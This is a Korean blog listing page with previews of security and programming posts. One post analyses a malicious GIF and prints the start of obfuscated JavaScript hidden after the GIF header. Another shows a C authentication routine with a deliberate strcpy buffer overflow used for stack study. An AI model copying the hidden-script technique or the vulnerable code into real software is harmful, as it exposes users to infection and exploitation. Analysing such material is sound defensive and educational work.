전체 글 썸네일형 리스트형 악성코드를 실행하는 gif 특정 웹사이트에 들어가면 gif 파일로딩시 바이러스라고 백신프로그램에서 체킹된다. 물론 바이러스 프로그램에 따라서 체킹이 안될 수 있는데. 긴급보안패치로 9월에 뉴스에도 나온것 같다. 아무튼 해당 gif파일을 서버에서 열어보니 GIF89a?Bz^S?script>function vxVVyyyVtYY(vyatdYxYYVy){ var vYVbVVyadad=594; return(parseInt(vyatdYxYYVy,16));}function vaxatxaVatd(vVaxyxtttVy){ var vVyyayVaYdx=594; var vtdYyYxtbYa='';for(vYYbYaydbYx=0; vYYbYaydbYx 와같은 html소스를 로딩하게끔 구현되어 있었다. 위의 코드중 nofomeka를 다시 얻어보니 위와 .. 더보기 프로그래밍 - gdb , objdump grep -A10 main.: 더보기 네트워킹 - 작은 웹서버 , 웹서버 원리 제작 TCP/IP 연결을 받아들인 후 웹서버는 HTTP 프로토콜을 사용해 다음 계층을 구현할 필요가 있다. 다음의 서버 코드는 연결 제어 코드가 함수에서 분리됐다는 점만 빼고 앞에서 살펴본 간단한 서버예제와 거의 같다. 이 함수는 웹 브라우저에서 온 HTTP GET과 HEAD 요청을 다룬다. 요청 받은 리소스를 웹루트라는 로컬 디렉터리에서 찾아 브라우저로 보낸다. 파일을 찾지 못하면 서버는 404 HTTP를 응답한다. File Not Found 응답은 자주 봤을 것이다. ---------------------------- 작은 웹서버 코드 -------------------------------- #include #include #include #include #include #include #include .. 더보기 [ gdb 로 스택 구조 확인 ] #include #include #include int check_authentication(char *password) { int auth_flag = 0; char password_buffer[16]; strcpy(password_buffer,password); if(strcmp(password_buffer,"brillig") == 0) auth_flag = 1; if(strcmp(password_buffer,"outgrabe") == 0) auth_flag = 1; return auth_flag; } int main(int argc, char *argv[]) { if(argc 더보기 이전 1 ··· 103 104 105 106 107 108 109 ··· 178 다음